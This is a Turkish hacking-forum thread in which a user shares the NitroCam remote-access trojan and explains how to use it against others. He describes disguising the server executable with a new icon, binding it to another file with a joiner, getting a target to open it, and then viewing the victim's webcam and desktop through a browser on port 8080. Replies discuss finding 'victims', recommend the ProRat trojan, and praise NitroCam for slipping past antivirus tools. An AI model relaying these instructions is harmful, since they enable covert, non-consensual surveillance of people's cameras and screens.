Nitrocam

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

SevencLoves

Altın Üye
Reaction score
0
Şimdiden sölim kimse çıkıpta bu daha önce tarafımdan verildi demesin..Şahsım tarafından daha önceden başka forumlarda verilmiş olabilir bu burdada verilemez anlamına gelmez bundan sonra yuvam burası ve yeni gelecek olanlar ve bilmeyenler için tekrar aktarıyorum Buyrun NİTROCAM

NitroCam, serverı açtırdıgınız bir bilgisayarın
Web Kamerasınından görüntü almanıza veya
Ekran görüntüsünü almanıza yarar

KULLANIMINA GELİNCE
nitrocam_server.exe dosyasını, istersenin herhangi
bir icon degistirici ile iconunu degistirip, isterseniz
NiklaJoiner kullanarak bir dosya ile birleştirip hedef
bilgisayara açtırın.

Kişi dosyayı açtıktan sonra; WebBrowserınızı açıp;
(IE, Netscape, FireFox Vs.)

web kamerasını izlemek için :
http://kişinin_ip_adresi:8080/webcam

Desktop görüntüsünü izlemek için :

http://kişinin_ip_adresi:8080/desktop
Yazıp, istediginiz aralıklarda refresh yapıp görüntü
alabilirsiniz

Ke4ndi makinenizde test etmek için
Serverı Açın, Ve browserınıza;
http://127.0.0.1:8080/webcam
http://127.0.0.1:8080/desktop

Yazıp Görüntü alabilirsiniz
Temizlemek için Fix_Remover.exe dosyasını açmanız yeterlidir

Nitrocam Download

yahu üstad ben bunu denedim ama bi türlü başarılı olamadım acaba cam mi bozuktu :rolleyes: :D

bide bunu indirip deneyelim bakalım.. kendimde de denedim hiç bi işe yaramadı çok garip ya :confused:

Yanılmıyorsam bu Xp de çalışmıyor Chamfer kendine başka işletim sistemi kulanan kurban bulacaksın ehue

Sevencloves' Alıntı:
Yanılmıyorsam bu Xp de çalışmıyor Chamfer kendine başka işletim sistemi kulanan kurban bulacaksın ehue

:eek: tüh desene ondan kendimdede denedim olmadı.. nerden bulcam ben öle kurban :rolleyes:

adamlar yakında longhorn a geçecek xp de çalışmayan ötekinde hiç çalışmaz vallaha... bunu geliştirmeleri lazım olmuyo böle yahu :D

Vall abir yandan haklısın ama bir yandanda hala 98 kulanan o kadar kulanıcı varki sende bende şaşırıp kalırız

Sevencloves' Alıntı:
Vall abir yandan haklısın ama bir yandanda hala 98 kulanan o kadar kulanıcı varki sende bende şaşırıp kalırız

wawllaha ben okuldayken biara 98 falan görmüştüm bidaha görmedim devamlı xp vardı bende ve çok memnunum nasıl yapıyolar 98 yada milenyumda şaşırıp kalıyom.. kimiside çok iyi diye savunuyo bana çok ilkel geliyo :rolleyes:

Ya karşıdan aslında görüntü almak istiyorsan en güzel program Prorat Açıklamasını geniş olarak mail güvenlik bölümünde verdim...Xp 98 milenyunm dinlemez serveri yedirdiğin her Pc de görüntü alırsın

bide onu inceleyim ama şuan okusam ve incelesem biişey anlamam orsı kesin çünkü bu kadar uykusuzlukla artık algılama yapamıyom :D yatıp dinlencem biraz sonra ondan sonrada kalkınca okurum artık ehueheuheu :D

chamfer ve sevencloves'in karşılıklı konuşması bayağı açıklayıcı olmuş , elinize sağlık:D

Sevencloves paylaşım için sağol,chamferi artık farklı kulvardada göreceğiz...:)

sevencloves olm ben denedim bende çalışıyodu 1 ay öncesine kadar tabi sonra format atınca gitti :D
yani xp de fıstık gibi çalışıyo

ThELeGoLaS ben çalıştığını biliyorum :) Kendim denedim kendimde olmasada başkalarında ama anlamadığım bnir çok kişide denemede başarısız oldu...Tek bildiğim 98 de fıstık gibi çalıştığı Bu programın en güzel özelliği Anti trojenlere yakalanmaması yani Masum bir trojen olarak görülüyor..

Sevencloves' Alıntı:
ThELeGoLaS ben çalıştığını biliyorum :) Kendim denedim kendimde olmasada başkalarında ama anlamadığım bnir çok kişide denemede başarısız oldu...Tek bildiğim 98 de fıstık gibi çalıştığı Bu programın en güzel özelliği Anti trojenlere yakalanmaması yani Masum bir trojen olarak görülüyor..
valla ThELeGoLaS uzun geliyosa w133 diyebilirsiniz :D
ben de denenedim başkalarında oluyodu bende :D
garip bişi yaw bu zamazingo :D

Sevencloves' Alıntı:

abi naaptın yaw.herkeş xp nerdeyse.neyse yinede eline sağlık.

program süper de xp de çalışmamsı kötü yaa yine de eline mouse na sağlık

paylaşım için sagol güzel bi pro...

sevencloves eline saglık cok guzel bır paylasım yalnız sunu sormadan gecemıcem
ben bu nıtrocam ındırdım de nasıl calıstıracagımı bılmıyorum yaw..
benım pc Xp,,ıp icin ıp traffıc monıtoru de ındırdım ,nitrocam da ındırdım hepsı var ama ne webcam acabıldım nede destkop,,yapamadım yanı..simdi bızım kurbana dosya falan mı gondermemız gerekıyor? icon demıssın nıkrojonıor falan demıssıın, :) bunlar benım bılmedım kelımeler abıcım yaw :))
benın ındırdıgım nıtrocamda fix.remover.exe _ kullanım o.... ve msn.exe_ var...
sevncloves abi bı yardımcı olsun su kardesıne :))
eyvallah abıcım hurmetler

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri